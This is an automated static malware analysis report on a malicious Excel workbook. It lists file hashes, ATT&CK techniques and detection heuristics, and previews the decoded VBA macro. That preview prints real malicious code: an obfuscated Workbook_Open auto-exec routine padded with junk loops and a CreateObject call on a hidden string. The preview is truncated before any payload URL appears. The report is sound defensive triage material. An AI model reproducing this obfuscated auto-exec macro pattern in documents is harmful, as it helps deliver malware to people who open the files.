Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 dc5e9fa588a2d026…

MALICIOUS

Office (OOXML)

27.8 KB Created: 2018-10-21 17:29:00 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2019-04-18
MD5: 88014768aed4f278dc4764b350238177 SHA-1: b37d5217ef6f2fc2a73ef1a9d05ca86741353287 SHA-256: dc5e9fa588a2d0268fe294fef2535818d4c3a52575783e0ae2e8ed7adbd4ec10
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The file is an OOXML document containing a Workbook_Open macro, which is a common technique for executing malicious code upon opening. The VBA code is heavily obfuscated with numerous loops and meaningless variable names, but the presence of `Shell()` and `CreateObject()` calls, along with the `OLE_VBA_PCODE_AUTOEXEC_EXEC` heuristic, strongly suggests it attempts to download and execute a second-stage payload. The obfuscation and lack of clear indicators prevent confident family attribution.

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 15378 bytes
SHA-256: d58f7f82f5839cf478547cc0b50af6b9d8e40008efc506f593c414ad6cc623f7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 7 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
fDwGJzIniARp.ZHs2xHASJ9RG6zhgX_55
While 26 = 4367
Dim zbgnsr_F8VWs_8bz1OLD6j9FYZUI6sC5rP48j_HEH3UxjhB8WqoHwz8Nb As Variant
Wend
Dim ZNQVyJNRb_ As Integer
While 8 = 9621
Dim xCcOvFF5CNIezWVvMC3G2RndIyzsRqFdGhM43a3Bp54_Q4 As Variant
Wend
Dim W49C7JXTGdW As Integer
While 6 = 517
Dim E6PVlTFoWQHa2uI1a6XnKNa5sNt6_v As Variant
Wend
Dim Zse5U6uRRh As Integer
While 12 = 9984
Dim leEtfJJAg3JEsuzdTmVjJikzY67YL_GmyuisTJKDi5 As Variant
Wend
Dim g3NlvHdaZn58 As Integer

While 28 = 5262
Dim qB4NSjMtwatfP7KFHHZQ_OBqkvHw5u As Variant
Wend
Dim nbrzDgyEzkzxF As Integer
While 2 = 4391
Dim HqUx7WRPMl8Z9KmfZYyBvPxZ3nQBRyaKG6h3ZT As Variant
Wend
Dim yfaWN_1lglbR As Integer
While 16 = 381
Dim IY8_Q1344REO7XJuRBlsE_jRiXBrhPEni_nALBnq_eYfZJYz4_Rd9rLD As Variant
Wend
Dim yoe3xIUmKZp7sH As Integer
While 21 = 6966
Dim hOW5sioC1X8Kxb7knzviKfft2yIvS_caEufCFD9lXvxE4lT As Variant
Wend
Dim ojuyIH6Arm As Integer
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "fDwGJzIniARp"
Dim yaQsE5FicH4h1ahqPEq6Qu8TSDJutLnvfChMtAEvip_TAKgMTToa5SjDb7XBsUyOcGAx2T7N94UjomRGe7YYfK1KaduvkDBM1xz3IsT_VZa_8_WymPev5 As String
 Function B3Y2r14e_C64dj1IIYrZyNdPFsMnQ6xdSbAELfC7KWfQ6tEJ8_9(ixjvwWmVSVwzOuBSXnhTbP_c1pwHMYx6XpCtLqqPhc6tYp4B6hlP)
While 22 = 1917
Dim pNS8rRZaYSBWDA93k8AsTqwFPEIO4IIvI_PjUksqLe As Variant
Wend
Dim v_X3T_HXlMvn As Integer
While 5 = 4739
Dim r9aKpkHJgOHOMCsXf_NSey4wrWtHEdg69dPQGI4GgB7f As Variant
Wend
Dim zHnQOt2l9bH As Integer

 Dim aEeQqbb6MNpstTwMiZiO5qdXigxdjJ9PtrGLMlS3fojbFW3xrFX1_RzsjEqIn8TCOY8BKi_7EpsNFAQKn9ucvGKZ1WkF4IMgSgLqXzkGEatWikliwdenK1OGLfIx82B6aJ4
While 2 = 8070
Dim DncRz_DBrLOrvaOV_Evb1W6irb2Ul46fUVLcpkPg84xl26d As Variant
Wend
Dim xddf2ooBoq3iW As Integer
While 13 = 9366
Dim FqYwOsUXMvpbyNc6iSpv8D1FVDzoTguvB2YOd As Variant
Wend
Dim UHi_iqxCBZK_ As Integer


   Dim PBl7CcN7qJTX3u5QinPxpW7iTvzKWhUtvY19cEIBiMLDdraWYurBubo2_BlPmCiHxilc36xbdMNaJ3_kSbulyS9Rs93Zc2XfmCN5E8cc7OffLLqJ7_6IP7SdjRs4BV9kyrxFmHeU8Qoiv
While 13 = 1259
Dim EWLvXCzRYK2pDpA3Z6xMah7fL2dHQRAXcNZVhNbUXKjIO2A2p4k_k7mfZoh As Variant
Wend
Dim fhp_EIcKyNmT As Integer
While 20 = 4238
Dim KbbxO8wPT1kbWp6vej462o6wrJc9vpKlCiYkHHWhlXMo6MlXMp As Variant
Wend
Dim oMTpaefoEDc As Integer
   
While 12 = 6128
Dim xcmo9YwPSmVLTRbaPzchDt__7PUF4_cCRDx5i_7xxG4CR_9V8 As Variant
Wend
Dim DOxldXCWmqqC As Integer
While 17 = 1216
Dim oVNIS3Pdg1O3nt6yBp7Q8GyxnYwntf6RNuGuo29Er2 As Variant
Wend
Dim ZL947tbMU7 As Integer
 Set PBl7CcN7qJTX3u5QinPxpW7iTvzKWhUtvY19cEIBiMLDdraWYurBubo2_BlPmCiHxilc36xbdMNaJ3_kSbulyS9Rs93Zc2XfmCN5E8cc7OffLLqJ7_6IP7SdjRs4BV9kyrxFmHeU8Qoiv = CreateObject(yaQsE5FicH4h1ahqPEq6Qu8TSDJutLnvfChMtAEvip_TAKgMTToa5SjDb7XBsUyOcGAx2T7N94UjomRGe7YYfK1KaduvkDBM1xz3IsT_VZa_8_WymPev5)
While 7 = 5861
Dim sY_ffYe3_kt_57n3lJIHqzh_qlysbCKfJ8hyojM As Variant
Wend
Dim OV__EGYPAODGP As Integer
While 15 = 635
Dim DKN2z9y4iuZB
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 44032 bytes
SHA-256: 07d8b38a00b759beb813e7131f35eed1c116ce1dc819d002a1d763063d1a1b1f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 7 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.